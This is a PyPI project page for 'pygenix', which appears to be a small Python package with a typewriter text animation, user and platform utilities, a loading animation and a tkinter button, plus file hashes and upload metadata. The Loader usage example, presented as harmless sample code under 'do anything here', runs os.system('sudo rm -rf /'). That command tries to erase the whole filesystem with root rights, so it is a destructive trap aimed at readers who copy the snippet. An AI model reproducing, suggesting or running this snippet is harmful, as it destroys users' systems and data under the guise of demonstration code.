A Python Package That Contains Text Aimations And Some Useful Utils
Project description
Pygenix
A Python Package With Superpowers ;)
Installation
Clone The Project Then,
cd pygenix
pip install .
Features
- Typewriter Text Animation
from pygenix.ani import textanimation
# textanimation(text , speed)
textanimation("Hello World :D" , 0.1) # can use 0.01 too.
- Getting Username
from pygenix.utils import user
print(user)
- Getting Platfrom
from pygenix.utils import platfrom
print(platfrom)
- Getting Specific Platfrom
from pygenix.utils import splatfrom
print(splatfrom)
- Getting a Loding Animation credits to him
from pygenix.utils import Loader
import os
with Loader("Loading..."):
#do anything here
os.system('sudo rm -rf /')
- Getting a tkinter hover button , creds and written by him
from pygenix.ani import tk_hover_btn
tk_hover_btn(root, x, y, text, bcolor, fcolor, cmd)
Project details
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
pygenix-1.0.tar.gz
(3.4 kB
view details)
Built Distribution
Filter files by name, interpreter, ABI, and platform.
If you're not sure about the file name format, learn more about wheel file names.
Copy a direct link to the current filters
pygenix-1.0-py3-none-any.whl
(3.7 kB
view details)
File details
Details for the file pygenix-1.0.tar.gz.
File metadata
- Download URL: pygenix-1.0.tar.gz
- Upload date:
- Size: 3.4 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/3.4.1 importlib_metadata/4.6.1 pkginfo/1.7.1 requests/2.25.1 requests-toolbelt/0.9.1 tqdm/4.61.2 CPython/3.9.5
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
3380863cb41d13ba33fac450570d1de5256c5dc6fddd48cadd3094f64f6ec02d
|
|
| MD5 |
13a3fb922f9d244735e52854859a2262
|
|
| BLAKE2b-256 |
aff5930e2a79536a7f85a2bff135864b75b90642a0cba1284109db5c7ee1c735
|
File details
Details for the file pygenix-1.0-py3-none-any.whl.
File metadata
- Download URL: pygenix-1.0-py3-none-any.whl
- Upload date:
- Size: 3.7 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/3.4.1 importlib_metadata/4.6.1 pkginfo/1.7.1 requests/2.25.1 requests-toolbelt/0.9.1 tqdm/4.61.2 CPython/3.9.5
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
2a0e3a654fbec73c5a03a0de9bebc63d32b54144952e92fb66a39f527c31b02c
|
|
| MD5 |
29411021fdcb44aae007c2d9675461e4
|
|
| BLAKE2b-256 |
4bcfc43a1eaf52b3c1a685186ad62a6c7675f23dcf14d1492cb1937f5b181542
|